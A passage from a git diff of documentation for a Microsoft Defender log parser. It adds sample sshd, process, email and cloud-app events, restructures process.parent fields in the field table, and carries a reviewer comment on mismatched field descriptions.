-oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R", + "InitiatingProcessFileSize": 890528, + "LogonType": "Network", + "RemoteIPType": "Private" + }, + "type": "LogonFailed" + }, + "destination": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "host": { + "id": "1111111111111111111111111111111111111111", + "name": "domain" + }, + "microsoft": { + "defender": { + "report": { + "id": "413706" + } + } + }, + "process": { + "args": [ + "-D", + "-R", + "-oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa", + 
"-oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc", + "-oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1-", + "-oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com", + "-oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1", + "-oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512", + "-oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com" + ], + "command_line": "/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc -oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 
-oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R", + "executable": "/usr/sbin/sshd", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "f1d50e0d3e0ba197baf152614e0cd94487a1142e", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "sshd", + "parent": { + "name": "sshd", + "pid": 3653343, + "start": "2024-11-18T10:07:20.290000Z" + }, + "pid": 3653343, + "start": "2024-11-18T10:07:20.293930Z", + "user": { + "domain": "domain", + "name": "root" + }, + "working_directory": "/usr/sbin" + }, + "related": { + "hash": [ + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232", + 
"f1d50e0d3e0ba197baf152614e0cd94487a1142e" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "account" + ] + }, + "user": { + "domain": "domain", + "name": "account" + } + } + + ``` + + === "test_device_network_connection.json" ```json @@ -1716,6 +2321,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "InitiatingProcessVersionInfoProductVersion": "4.18.2301.6", "LogonId": "999", "ProcessIntegrityLevel": "System", + "ProcessTokenElevation": "TokenElevationTypeDefault", "ProcessVersionInfoCompanyName": "Microsoft Corporation", "ProcessVersionInfoFileDescription": "Microsoft Malware Protection Command Line Utility", "ProcessVersionInfoInternalFileName": "MpCmdRun", 
@@ -1755,31 +2361,33 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "54", "Scan" ], - "code_signature": { - "status": "Valid", - "subject_name": "OsVendor" - }, "command_line": "\"MpCmdRun.exe\" Scan -ScheduleJob -RestrictPrivileges -DailyScan -ScanTrigger 54", - "executable": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0\\msmpeng.exe", - "hash": { - "md5": "5d5608654828cf052ba013b3c37cbb61", - "sha1": "5bfbb0f965e2761d75a51faacc9db6a146a7c5ae", - "sha256": "52bd0a4d149f7913b9c3ba111eff1e75188abfcdc54b927390bc3bfad419860e" - }, - "name": "MsMpEng.exe", + "name": "MpCmdRun.exe", "parent": { - "name": "services.exe", - "pid": 1032, - "start": "2023-01-03T08:51:26.740241Z" + "code_signature": { + "status": "Valid", + "subject_name": "OsVendor" + }, + "command_line": "\"MsMpEng.exe\"", + "executable": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0\\msmpeng.exe", + "hash": { + "md5": "5d5608654828cf052ba013b3c37cbb61", + "sha1": "5bfbb0f965e2761d75a51faacc9db6a146a7c5ae", + "sha256": "52bd0a4d149f7913b9c3ba111eff1e75188abfcdc54b927390bc3bfad419860e" + }, + "name": "MsMpEng.exe", + "pid": 5456, + "start": "2023-01-03T08:51:29.269279Z", + "user": { + "domain": "NT", + "id": "S-1-1-11", + "name": "System" + }, + "working_directory": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0" }, "pid": 37788, "start": "2023-01-04T14:15:10.355033Z", - "user": { - "domain": "NT", - "id": "S-1-1-11", - "name": "System" - }, - "working_directory": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0" + "working_directory": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2301.6-0" }, "related": { "hash": [ 
@@ -1854,20 +2462,23 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "-o", "comm,pid,pcpu,pmem,rss,etimes" ], - "code_signature": { - "status": "Unknown", - "subject_name": "Unknown" - }, "command_line": "/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers", + "name": "ps", "parent": { - "pid": 0 + "code_signature": { + "status": "Unknown", + "subject_name": "Unknown" + }, + "pid": 423627, + "start": "2024-10-22T15:09:44.590000Z", + "user": { + "domain": "computer", + "name": "root" + } }, "pid": 423627, "start": "2024-10-22T15:09:44.594155Z", - "user": { - "domain": "computer", - "name": "root" - } + "working_directory": "/usr/bin" }, "related": { "hash": [ 
@@ -2089,6 +2700,152 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_email_delivered.json" + + ```json + + { + "message": "{\"time\":\"2024-10-28T14:31:34.1371671Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:40.3469550Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<1@eu-west-1.test.com>\",\"Timestamp\":\"2024-10-28T14:18:40Z\",\"EmailClusterId\":3162398878,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@company.com\",\"SenderFromAddress\":\"john.doe@company.com\",\"SenderMailFromDomain\":\"company.com\",\"SenderFromDomain\":\"company.com\",\"RecipientEmailAddress\":\"alan.smithee@company.com\",\"Subject\":\"MAIL subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}", + "event": { + "action": "Delivered", + "category": [ + "connection", + "email" + ], + "dataset": "email_events", + "type": [ + "allowed", + "info" + ] + }, + "@timestamp": "2024-10-28T14:18:40Z", + "action": { + 
"properties": { + "AttachmentCount": 0, + "AuthenticationDetails": "{\"DKIM\": \"none\", \"DMARC\": \"pass\", \"SPF\": \"pass\"}", + "Connectors": "Relai SMTP interne", + "DeliveryAction": "Delivered", + "DeliveryLocation": "Inbox/folder", + "EmailClusterId": "3162398878", + "EmailDirection": "Inbound", + "EmailLanguage": "en", + "OrgLevelAction": "Allow", + "OrgLevelPolicy": "Connection policy", + "RecipientObjectId": "abcd1234-abcd-1234-ef90-123456abcdef", + "SenderFromDomain": "company.com", + "UrlCount": 0 + } + }, + "email": { + "direction": "inbound", + "from": { + "address": [ + "john.doe@company.com" + ] + }, + "local_id": "12345678-1234-abcd-ef90-abcdef123456", + "message_id": "<1@eu-west-1.test.com>", + "subject": "MAIL subject", + "to": { + "address": [ + "alan.smithee@company.com" + ] + } + }, + "microsoft": { + "defender": { + "report": { + "id": "12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c" + } + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + } + } + + ``` + + +=== "test_email_delivered2.json" + + ```json + + { + "message": "{\"time\":\"2024-10-28T14:39:28.9769628Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:38.5006358Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<20241028141819.43623347A8F@test.fr>\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"EmailClusterId\":2633942188,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@test.fr\",\"SenderFromAddress\":\"john.doe@test.fr\",\"SenderMailFromDomain\":\"test.fr\",\"SenderFromDomain\":\"test.fr\",\"RecipientEmailAddress\":\"alan.smithee@test.fr\",\"Subject\":\"EMAIL 
Subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}", + "event": { + "action": "Delivered", + "category": [ + "connection", + "email" + ], + "dataset": "email_events", + "type": [ + "allowed", + "info" + ] + }, + "@timestamp": "2024-10-28T14:18:38Z", + "action": { + "properties": { + "AttachmentCount": 0, + "AuthenticationDetails": "{\"DKIM\": \"none\", \"DMARC\": \"pass\", \"SPF\": \"pass\"}", + "Connectors": "Relai SMTP interne", + "DeliveryAction": "Delivered", + "DeliveryLocation": "Inbox/folder", + "EmailClusterId": "2633942188", + "EmailDirection": "Inbound", + "EmailLanguage": "en", + "OrgLevelAction": "Allow", + "OrgLevelPolicy": "Connection policy", + "RecipientObjectId": "abcd1234-abcd-1234-ef90-123456abcdef", + "SenderFromDomain": "test.fr", + "UrlCount": 0 + } + }, + "email": { + "direction": "inbound", + "from": { + "address": [ + "john.doe@test.fr" + ] + }, + "local_id": "12345678-1234-abcd-ef90-abcdef123456", + "message_id": "<20241028141819.43623347A8F@test.fr>", + "subject": "EMAIL Subject", + "to": { + "address": [ + "alan.smithee@test.fr" + ] + } + }, + "microsoft": { + "defender": { + "report": { + "id": "12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c" + } + } + }, + "related": { + "ip": 
[ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + } + } + + ``` + + === "test_email_events.json" ```json 
@@ -2193,7 +2950,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I
 ```json
 {
- "message": "{\"time\": \"2024-10-03T11:12:21.6209320Z\", \"tenantId\": \"ca4e9ba9-4582-4f4b-a93e-c6ce41b32aac\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-EmailPostDeliveryEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:11:32.8258142Z\", \"properties\": {\"ReportId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7-10422652723071570813\", \"NetworkMessageId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7\", \"RecipientEmailAddress\": \"john.doe@example.com\", \"Timestamp\": \"2024-10-03T11:11:32Z\", \"ActionType\": \"Spam ZAP\", \"ActionResult\": \"Success\", \"Action\": \"Moved to quarantine\", \"DeliveryLocation\": \"Quarantine\", \"ActionTrigger\": \"SpecialAction\", \"InternetMessageId\": \"<01020192520c9bb4-8a4c9d72-a832-47b9-a13f-ce92d3da71ba-000000@eu-west-1.amazonses.com>\", \"ThreatTypes\": \"Spam\", \"DetectionMethods\": \"{\\\"Spam\\\":[\\\"Fingerprint matching\\\"]}\"}, \"Tenant\": \"DefaultTenant\"}",
+ "message": "{\"time\": \"2024-10-03T11:12:21.6209320Z\", \"tenantId\": \"ca4e9ba9-4582-4f4b-a93e-c6ce41b32aac\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-EmailPostDeliveryEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:11:32.8258142Z\", \"properties\": {\"ReportId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7-10422652723071570813\", \"NetworkMessageId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7\", \"RecipientEmailAddress\": \"john.doe@example.com\", \"Timestamp\": \"2024-10-03T11:11:32Z\", \"ActionType\": \"Spam ZAP\", \"ActionResult\": \"Success\", \"Action\": \"Moved to quarantine\", \"DeliveryLocation\": \"Quarantine\", \"ActionTrigger\": \"SpecialAction\", \"InternetMessageId\": \"<1@eu-west-1.amazonses.com>\", \"ThreatTypes\": \"Spam\", \"DetectionMethods\": \"{\\\"Spam\\\":[\\\"Fingerprint matching\\\"]}\"}, \"Tenant\": \"DefaultTenant\"}",
 "event": {
 "action": "Moved to quarantine",
 "category": [
@@ -2583,7 +3340,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I
 ```json
 {
- "message": "{\"time\": \"2024-10-03T11:13:23.4712503Z\", \"tenantId\": \"a1616f45-c922-4c95-acca-f69494cb464e\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityInfo\", \"_TimeReceivedBySvc\": \"2024-10-03T11:13:23.4430000Z\", \"properties\": {\"Timestamp\": \"2024-10-03T11:13:23.0234783Z\", \"ReportId\": \"6aefc315-d9e5-4230-81b4-c2d0b40b6282\", \"AccountName\": \"123456\", \"AccountDomain\": \"itg.local\", \"AccountUpn\": \"johndoe@example.com\", \"AccountObjectId\": \"b1ea6dde-2f60-4c1c-ba51-a929e2dba958\", \"AccountDisplayName\": \"DOE John\", \"GivenName\": \"Emma\", \"Surname\": \"TSCHAEN\", \"Department\": null, \"JobTitle\": null, \"EmailAddress\": \"johndoe@example.com\", \"Manager\": null, \"Address\": null, \"City\": null, \"Country\": null, \"Phone\": null, \"CreatedDateTime\": \"2024-07-20T02:45:30Z\", \"DistinguishedName\": \"CN=DOE John,OU=PGE,OU=Student,DC=itg,DC=local\", \"OnPremSid\": \"S-1-5-21-2308620423-2764619233-3639949770-5127445\", \"CloudSid\": \"S-1\", \"IsAccountEnabled\": true, \"SourceProvider\": \"AzureActiveDirectory\", \"ChangeSource\": \"AzureActiveDirectory\", \"BlastRadius\": null, \"CompanyName\": null, \"DeletedDateTime\": null, \"EmployeeId\": null, \"OtherMailAddresses\": null, \"RiskLevel\": null, \"RiskLevelDetails\": null, \"State\": null, \"Tags\": [], \"CriticalityLevel\": null, \"SipProxyAddress\": \"\", \"Type\": \"User\"}, \"Tenant\": \"DefaultTenant\"}",
+ "message": "{\"time\": \"2024-10-03T11:13:23.4712503Z\", \"tenantId\": \"a1616f45-c922-4c95-acca-f69494cb464e\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityInfo\", \"_TimeReceivedBySvc\": \"2024-10-03T11:13:23.4430000Z\", \"properties\": {\"Timestamp\": \"2024-10-03T11:13:23.0234783Z\", \"ReportId\": \"6aefc315-d9e5-4230-81b4-c2d0b40b6282\", \"AccountName\": \"123456\", \"AccountDomain\": \"itg.local\", \"AccountUpn\": \"johndoe@example.com\", \"AccountObjectId\": \"b1ea6dde-2f60-4c1c-ba51-a929e2dba958\", \"AccountDisplayName\": \"DOE John\", \"GivenName\": \"Emma\", \"Surname\": \"TSCHAEN\", \"Department\": null, \"JobTitle\": null, \"EmailAddress\": \"johndoe@example.com\", \"Manager\": null, \"Address\": null, \"City\": null, \"Country\": null, \"Phone\": null, \"CreatedDateTime\": \"2024-07-20T02:45:30Z\", \"DistinguishedName\": \"CN=DOE John,OU=PGE,OU=Student,DC=itg,DC=local\", \"OnPremSid\": \"S-1\", \"CloudSid\": \"S-1\", \"IsAccountEnabled\": true, \"SourceProvider\": \"AzureActiveDirectory\", \"ChangeSource\": \"AzureActiveDirectory\", \"BlastRadius\": null, \"CompanyName\": null, \"DeletedDateTime\": null, \"EmployeeId\": null, \"OtherMailAddresses\": null, \"RiskLevel\": null, \"RiskLevelDetails\": null, \"State\": null, \"Tags\": [], \"CriticalityLevel\": null, \"SipProxyAddress\": \"\", \"Type\": \"User\"}, \"Tenant\": \"DefaultTenant\"}",
 "event": {
 "category": [
 "iam"
@@ -3187,30 +3944,36 @@ This section demonstrates how the raw logs will be transformed by our parsers. I
 "-F",
 "smtpd_tls_protocols\\commandtest"
 ],
- "code_signature": {
- "status": "Unknown",
- "subject_name": "Unknown"
- },
 "command_line": "grep -F smtpd_tls_protocols\\commandtest",
- "executable": "/usr/test/platform-python3.6",
- "hash": {
- "md5": "eeeee2999444ddaaaaa08598b06eafe7",
- "sha1": "ff77777000aaaaaaaaaffb100000c0fb25ccccc6",
- "sha256": "3aa8333873527333382433308d52333230354923305566335f7e9f0a732ea565"
- },
- "name": "platform-python3.6",
+ "name": "grep",
 "parent": {
+ "args": [
+ "--register",
+ "/usr/lib/python3.6/run.py"
+ ],
+ "code_signature": {
+ "status": "Unknown",
+ "subject_name": "Unknown"
+ },
+ "command_line": "/usr/test/platform-python /usr/lib/python3.6/run.py --register",
+ "executable": "/usr/test/platform-python3.6",
+ "hash": {
+ "md5": "eeeee2999444ddaaaaa08598b06eafe7",
+ "sha1": "ff77777000aaaaaaaaaffb100000c0fb25ccccc6",
+ "sha256": "3aa8333873527333382433308d52333230354923305566335f7e9f0a732ea565"
+ },
 "name": "platform-python3.6",
- "pid": 408229,
- "start": "2024-09-24T14:17:34.790000Z"
+ "pid": 408996,
+ "start": "2024-09-24T14:18:11.850000Z",
+ "user": {
+ "domain": "testdomain",
+ "name": "testaccount"
+ },
+ "working_directory": "/usr/test"
 },
 "pid": 408996,
 "start": "2024-09-24T14:18:11.864114Z",
- "user": {
- "domain": "testdomain",
- "name": "testaccount"
- },
- "working_directory": "/usr/test"
+ "working_directory": "/usr/bin"
 },
 "related": {
 "hash": [
@@ -3476,17 +4239,26 @@ The following table lists the fields that are extracted, normalized under the EC
 |`microsoft.defender.threat.types` | `keyword` | Verdict from the email filtering stack on whether the email contains malware, phishing, or other threats |
 |`network.protocol` | `keyword` | Application protocol name. |
 |`process.args` | `keyword` | Array of process arguments. |
-|`process.code_signature.status` | `keyword` | Additional information about the certificate status. |
-|`process.code_signature.subject_name` | `keyword` | Subject name of the code signer |
 |`process.command_line` | `wildcard` | Full command line that started the process. |
 |`process.executable` | `keyword` | Absolute path to the process executable. |
 |`process.hash.md5` | `keyword` | MD5 hash. |
 |`process.hash.sha1` | `keyword` | SHA1 hash. |
 |`process.hash.sha256` | `keyword` | SHA256 hash. |
 |`process.name` | `keyword` | Process name. |
+|`process.parent.args` | `keyword` | Array of process arguments. |
+|`process.parent.code_signature.status` | `keyword` | Additional information about the certificate status. |
+|`process.parent.code_signature.subject_name` | `keyword` | Subject name of the code signer |
+|`process.parent.command_line` | `wildcard` | Full command line that started the process. |
+|`process.parent.executable` | `keyword` | Absolute path to the process executable. |
+|`process.parent.hash.md5` | `keyword` | MD5 hash. |
+|`process.parent.hash.sha1` | `keyword` | SHA1 hash. |
+|`process.parent.hash.sha256` | `keyword` | SHA256 hash. |
 |`process.parent.name` | `keyword` | Process name. |
 |`process.parent.pid` | `long` | Process id. |
 |`process.parent.start` | `date` | The time the process started. |
+|`process.parent.user.domain` | `keyword` | |
+|`process.parent.user.email` | `keyword` | |
+|`process.parent.working_directory` | `keyword` | The working directory of the process. |
 |`process.pid` | `long` | Process id. |
 |`process.start` | `date` | The time the process started. |
 |`process.user.domain` | `keyword` | Domain of the account that ran the process responsible for the event |
diff --git a/_shared_content/operations_center/integrations/generated/05e6f36d-cee0-4f06-b575-9e43af779f9f_sample.md b/_shared_content/operations_center/integrations/generated/05e6f36d-cee0-4f06-b575-9e43af779f9f_sample.md
index ec7685a3f..f130e1e09 100644
--- a/_shared_content/operations_center/integrations/generated/05e6f36d-cee0-4f06-b575-9e43af779f9f_sample.md
+++ b/_shared_content/operations_center/integrations/generated/05e6f36d-cee0-4f06-b575-9e43af779f9f_sample.md
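Review bot: The two new rows `process.parent.user.domain` and `process.parent.user.email` have an empty description cell, unlike the `process.user.domain` row just below them; mirror it, e.g. `|`process.parent.user.domain` | `keyword` | Domain of the account that ran the parent process |`. The samples earlier in this diff (the MsMpEng.exe hunk at -1755/+2361 and the ps hunk at -1854/+2462) emit `process.parent.user.name` and `process.parent.user.id` but never `process.parent.user.email`, so the table and the samples disagree on which user fields exist under `process.parent`; if the table is generated from the parser's field declarations, those declarations are presumably what needs fixing. Dropping the `process.code_signature.*` rows here gives analysts whose rules reference those fields no pointer to `process.parent.code_signature.*`, where the samples now place the data; a short note in the integration's changelog would cover that.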
@@ -622,6 +622,99 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_cloud_app4" + + + ```json + { + "time": "2024-10-28T14:24:31.9854915Z", + "tenantId": "12345678-abcd-ef09-1234-123456abcdef", + "operationName": "Publish", + "category": "AdvancedHunting-CloudAppEvents", + "_TimeReceivedBySvc": "2024-10-28T14:20:30.0960000Z", + "properties": { + "ActionType": "MessageReadReceiptReceived", + "ApplicationId": 28375, + "AccountDisplayName": "John DOE", + "AccountObjectId": "abcd1234-1234-1234-1234-abcdef123456", + "AccountId": "abcd1234-1234-1234-1234-abcdef123456", + "DeviceType": null, + "OSPlatform": null, + "IPAddress": null, + "IsAnonymousProxy": null, + "CountryCode": null, + "City": null, + "ISP": null, + "UserAgent": null, + "IsAdminOperation": false, + "ActivityObjects": [ + { + "Type": "Structured object", + "Role": "Parameter", + "ServiceObjectType": "Microsoft Team" + }, + { + "Type": "User", + "Role": "Actor", + "Name": "John DOE", + "Id": "abcd1234-1234-1234-1234-abcdef123456", + "ApplicationId": 11161, + "ApplicationInstance": 0 + } + ], + "AdditionalFields": {}, + "ActivityType": "Basic", + "ObjectName": null, + "ObjectType": null, + "ObjectId": null, + "AppInstanceId": 0, + "AccountType": "Regular", + "IsExternalUser": false, + "IsImpersonated": false, + "IPTags": null, + "IPCategory": null, + "UserAgentTags": null, + "RawEventData": { + "ChatThreadId": "19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com", + "CommunicationType": "GroupChat", + "CreationTime": "2024-10-28T14:18:38Z", + "ExtraProperties": [], + "Id": "abcd1234-ef09-1234-abcd-123456abcdef", + "ItemName": "19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com", + "MessageId": "1730125116564", + "MessageVersion": "0", + "MessageVisibilityTime": "2022-09-21T08:33:35Z", + "Operation": "MessageReadReceiptReceived", + "OrganizationId": "12345678-abcd-ef09-1234-123456abcdef", + 
